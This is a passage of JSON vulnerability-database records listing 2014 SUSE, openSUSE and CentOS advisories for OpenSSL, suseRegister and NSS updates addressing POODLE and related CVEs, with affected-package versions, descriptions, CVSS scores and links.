"SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * SRTP Memory Leak (CVE-2014-3513)\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3513\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513</a>&gt;\n * CVE-2014-3567\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>&gt;\n * CVE-2014-3566\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>&gt;\n * CVE-2014-3568\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>&gt;\n", "edition": 1, "reporter": "Suse", "published": "2014-11-04T23:04:45", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "Security update for openssl1 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-04T23:04:45", "id": "SUSE-SU-2014:1357-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-debuginfo-32bit", "packageFilename": "libopenssl1_0_0-debuginfo-32bit-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-doc", "packageFilename": "openssl-doc-1.0.1j-1.68.1.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl-devel-32bit", "packageFilename": "libopenssl-devel-32bit-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl-devel-32bit", "packageFilename": "libopenssl-devel-32bit-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-debuginfo-32bit", "packageFilename": "libopenssl1_0_0-debuginfo-32bit-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-doc", "packageFilename": "openssl-doc-1.0.1j-11.56.1.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "The following issues were fixed in this release:\n\n CVE-2014-3566: SSLv3 POODLE attack (bnc#901223) CVE-2014-3513,\n CVE-2014-3567: DTLS memory leak and session ticket memory leak\n\n", "edition": 1, "reporter": "Suse", "published": "2014-10-29T16:05:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "update for openssl (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-29T16:05:00", "id": "OPENSUSE-SU-2014:1331-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:41", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901757", "http://download.suse.com/patch/finder/?keywords=607ea368d0c29e0c7f5f3a31b17fddd9"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "1.4-1.35.1", "arch": "noarch", "packageFilename": "suseRegister-1.4-1.35.1.noarch.rpm", "packageName": "suseRegister", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "1.4-1.35.1", "arch": "noarch", "packageFilename": "suseRegister-1.4-1.35.1.noarch.rpm", "packageName": "suseRegister", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "1.4-1.35.1", "arch": "noarch", "packageFilename": "suseRegister-1.4-1.35.1.noarch.rpm", "packageName": "suseRegister", "operator": "lt"}], "description": "suseRegister was updated to fix one security issue:\n\n * POODLE: Ensure that only TLS is used. (CVE-2014-3566)\n\n Security Issues:\n\n * CVE-2014-3566\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>&gt;\n\n", "edition": 1, "reporter": "Suse", "published": "2015-01-05T21:04:43", "title": "Security update for suseRegister (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2015-01-05T21:04:43", "id": "SUSE-SU-2015:0010-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00000.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2018-03-09T11:46:27", "references": ["https://rhn.redhat.com/errata/RHSA-2014-1652.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-perl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-perl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-libs", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-static-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-libs", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-1.0.1e-34.el7_0.6.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-static", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-static", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-static-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl-static", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-perl", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:1652\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020695.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020697.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2014-October/001475.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-libs\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1652.html", "edition": 3, "reporter": "CentOS Project", "published": "2014-10-16T16:22:42", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "openssl security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2014-10-20T18:15:10", "href": "http://lists.centos.org/pipermail/centos-announce/2014-October/020695.html", "id": "CESA-2014:1652", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:50", "references": ["https://rhn.redhat.com/errata/RHSA-2014-1948.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "any", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "x86_64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "x86_64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "any", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": 